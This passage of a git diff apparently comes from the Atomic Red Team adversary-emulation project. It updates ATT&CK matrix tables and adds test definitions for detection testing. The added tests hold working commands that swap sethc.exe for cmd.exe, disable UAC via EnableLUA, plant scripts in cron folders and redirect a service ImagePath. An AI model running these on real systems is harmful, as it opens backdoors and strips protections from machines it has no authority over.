TEST](https://atomicredteam.io/contributing) | | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | @@ -9,7 +9,7 @@ | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Groups](../../T1069.002/T1069.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [External Remote Services](../../T1133/T1133.md) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Groups](../../T1069.002/T1069.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | @@ -38,7 +38,7 @@ | | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | | | | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [External Remote Services](../../T1133/T1133.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | | | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index bdfc59d5..0c3905e9 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md @@ -8,7 +8,7 @@ | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | @@ -29,7 +29,7 @@ | | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | [Screen Capture](../../T1113/T1113.md) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Service Discovery](../../T1007/T1007.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Time Discovery](../../T1124/T1124.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | -| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8283e50f..a13e2434 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -337,14 +337,23 @@ privilege-escalation: type: Path default: C:\windows\system32\cmd.exe executor: - command: "$input_table = \"#{parent_list}\".split(\",\")\n$Name = \"Debugger\"\n$Value - = \"#{attached_process}\"\nForeach ($item in $input_table){ \n $item - = $item.trim()\n $registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows - NT\\CurrentVersion\\Image File Execution Options\\$item\"\n IF(!(Test-Path - $registryPath))\n {\n New-Item -Path $registryPath -Force\n New-ItemProperty - -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force\n - \ }\n ELSE\n {\n New-ItemProperty -Path $registryPath -Name $name -Value - $Value\n }\n}\n" + command: | + $input_table = "#{parent_list}".split(",") + $Name = "Debugger" + $Value = "#{attached_process}" + Foreach ($item in $input_table){ + $item = $item.trim() + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + } cleanup_command: | $input_table = "#{parent_list}".split(",") Foreach ($item in $input_table) @@ -354,6 +363,24 @@ privilege-escalation: } name: powershell elevation_required: true + - name: Replace binary of sticky keys + auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 + description: 'Replace sticky keys binary (sethc.exe) with cmd.exe + +' + supported_platforms: + - windows + executor: + command: | + copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe + takeown /F C:\Windows\System32\sethc.exe /A + icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t + copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe + cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe + +' + name: command_prompt + elevation_required: true T1546.009: technique: external_references: @@ -1435,10 +1462,11 @@ privilege-escalation: elevation_required: true - name: Bypass UAC using sdclt DelegateExecute auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7 - description: "Bypasses User Account Control using a fileless method, registry - only. \nUpon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\n[Reference - - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\nAdapted - from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\n" + description: | + Bypasses User Account Control using a fileless method, registry only. + Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe + [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) + Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) supported_platforms: - windows input_arguments: @@ -1457,6 +1485,24 @@ privilege-escalation: ' name: powershell + - name: Disable UAC using reg.exe + auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 + description: | + Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key + HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 + supported_platforms: + - windows + executor: + command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System + /v EnableLUA /t REG_DWORD /d 0 /f + +' + cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System + /v EnableLUA /t REG_DWORD /d 1 /f + +' + name: command_prompt + elevation_required: true T1574.012: technique: external_references: @@ -2097,11 +2143,12 @@ privilege-escalation: cleanup_command: 'crontab /tmp/notevil ' - - name: Cron - Add script to cron folder + - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 - description: 'This test adds a script to a cron folder configured to execute - on a schedule. This technique was used by the threat actor Rocke during the - exploitation of Linux web servers. + description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, + /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a + schedule. This technique was used by the threat actor Rocke during the exploitation + of Linux web servers. ' supported_platforms: @@ -2119,10 +2166,41 @@ privilege-escalation: executor: elevation_required: true name: bash - command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name} + command: | + echo "#{command}" > /etc/cron.daily/#{cron_script_name} + echo "#{command}" > /etc/cron.hourly/#{cron_script_name} + echo "#{command}" > /etc/cron.monthly/#{cron_script_name} + echo "#{command}" > /etc/cron.weekly/#{cron_script_name} + cleanup_command: | + rm /etc/cron.daily/#{cron_script_name} + rm /etc/cron.hourly/#{cron_script_name} + rm /etc/cron.monthly/#{cron_script_name} + rm /etc/cron.weekly/#{cron_script_name} + - name: Cron - Add script to /var/spool/cron/crontabs/ folder + auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 + description: 'This test adds a script to a /var/spool/cron/crontabs folder configured + to execute on a schedule. This technique was used by the threat actor Rocke + during the exploitation of Linux web servers. ' - cleanup_command: 'rm /etc/cron.daily/#{cron_script_name} + supported_platforms: + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in /var/spool/cron/crontabs folder + type: string + default: persistevil + executor: + elevation_required: true + name: bash + command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} + +' + cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} ' T1574.001: @@ -6767,9 +6845,9 @@ privilege-escalation: atomic_tests: - name: Service Registry Permissions Weakness auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a - description: "Service registry permissions weakness check and then which can - lead to privilege escalation with ImagePath. eg. \nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\" - /v ImagePath /d \"C:\\temp\\AtomicRedteam.exe\"\n" + description: | + Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. + reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" supported_platforms: - windows input_arguments: @@ -6782,6 +6860,48 @@ privilege-escalation: get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL name: powershell + - name: Service ImagePath Change with reg.exe + auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 + description: 'Change Service registry ImagePath of a bengin service to a malicious + file + +' + supported_platforms: + - windows + input_arguments: + weak_service_name: + description: weak service name + type: String + default: calcservice + weak_service_path: + description: weak service path + type: String + default: "%windir%\\system32\\win32calc.exe" + malicious_service_path: + description: malicious service path + type: String + default: "%windir%\\system32\\cmd.exe" + dependency_executor_name: powershell + dependencies: + - description: 'The service must exist (#{weak_service_name}) + +' + prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit + 1} + +' + get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" + +' + executor: + command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" + /f /v ImagePath /d "#{malicious_service_path}" + +' + cleanup_command: 